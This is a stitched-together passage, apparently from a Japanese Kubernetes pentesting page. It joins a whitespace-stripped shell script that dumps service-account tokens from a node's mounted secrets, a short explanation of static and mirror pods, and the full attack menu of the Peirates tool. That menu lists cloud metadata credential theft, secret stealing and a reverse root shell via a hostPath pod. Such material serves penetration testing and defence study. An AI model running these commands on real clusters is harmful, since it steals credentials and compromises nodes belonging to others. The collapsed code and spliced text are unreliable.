# Check Kubelet privilegeskubectl--kubeconfig/var/lib/kubelet/kubeconfigauthcan-icreatepod-nkube-system# Steal the tokens from the pods running in the node# The most interesting one is probably the one of kube-systemALREADY="IinItialVaaluE"for i in $(mount|sed-n'/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); doTOKEN=$(cat $(echo $i |sed's/.namespace$/\/token/'))if! [ $(echo $TOKEN |grep-E $ALREADY) ]; thenALREADY="$ALREADY|$TOKEN"echo"Directory: $i"echo"Namespace: $(cat $i)"echo""echo $TOKENecho"================================================================================"echo""fidone
kubelet は、各静的 Pod に対して Kubernetes API サーバー上にミラーポッドを自動的に作成しようとします。これは、ノード上で実行されている Pods が API サーバーで可視化されることを意味しますが、そこから制御することはできません。Pod 名は、先頭にハイフンを付けたノードホスト名でサフィックスされます。
静的 Pod の spec は他の API オブジェクトを参照することはできません(例:ServiceAccount、ConfigMap、Secret など)。したがって、この動作を悪用して、現在のノードで任意の serviceAccount を持つポッドを起動してクラスターを侵害することはできません。しかし、何らかの理由で役立つ場合に、異なる名前空間でポッドを実行するためにこれを使用することはできます。
Peirates v1.1.8-beta by InGuardians
[+] Service Account Loaded: Pod ns::dashboard-56755cd6c9-n8zt9
[+] Certificate Authority Certificate: true
[+] Kubernetes API Server:
[+] Current hostname/pod name: dashboard-56755cd6c9-n8zt9
[+] Current namespace: prd
Namespaces, Service Accounts and Roles |
[1] List, maintain, or switch service account contexts [sa-menu] (try: listsa *, switchsa)
[2] List and/or change namespaces [ns-menu] (try: listns, switchns)
[3] Get list of pods in current namespace [list-pods]
[4] Get complete info on all pods (json) [dump-pod-info]
[5] Check all pods for volume mounts [find-volume-mounts]
[6] Enter AWS IAM credentials manually [enter-aws-credentials]
[7] Attempt to Assume a Different AWS Role [aws-assume-role]
[8] Deactivate assumed AWS role [aws-empty-assumed-role]
[9] Switch authentication contexts: certificate-based authentication (kubelet, kubeproxy, manually-entered) [cert-menu]
Steal Service Accounts |
[10] List secrets in this namespace from API server [list-secrets]
[11] Get a service account token from a secret [secret-to-sa]
[12] Request IAM credentials from AWS Metadata API [get-aws-token] *
[13] Request IAM credentials from GCP Metadata API [get-gcp-token] *
[14] Request kube-env from GCP Metadata API [attack-kube-env-gcp]
[15] Pull Kubernetes service account tokens from kops' GCS bucket (Google Cloudonly) [attack-kops-gcs-1] *
[16] Pull Kubernetes service account tokens from kops' S3 bucket (AWS only) [attack-kops-aws-1]
Interrogate/Abuse Cloud API's |
[17] List AWS S3 Buckets accessible (Make sure to get credentials via get-aws-token or enter manually) [aws-s3-ls]
[18] List contents of an AWS S3 Bucket (Make sure to get credentials via get-aws-token or enter manually) [aws-s3-ls-objects]
Compromise |
[20] Gain a reverse rootshell on a node by launching a hostPath-mounting pod [attack-pod-hostpath-mount]
[21] Run command in one or all pods in this namespace via the API Server [exec-via-api]
[22] Run a token-dumping command in all pods via Kubelets (authorization permitting) [exec-via-kubelet]
Node Attacks |
[30] Steal secrets from the node filesystem [nodefs-steal-secrets]
Off-Menu +
[90] Run a kubectl command using the current authorization context [kubectl [arguments]]
[] Run a kubectl command using EVERY authorization context until one works [kubectl-try-all [arguments]]
[91] Make an HTTP request (GET or POST) to a user-specified URL [curl]
[92] Deactivate "auth can-i" checking before attempting actions [set-auth-can-i]
[93] Run a simple all-ports TCP port scan against an IP address [tcpscan]
[94] Enumerate services via DNS [enumerate-dns] *
[] Run a shell command [shell <command and arguments>]
[exit] Exit Peirates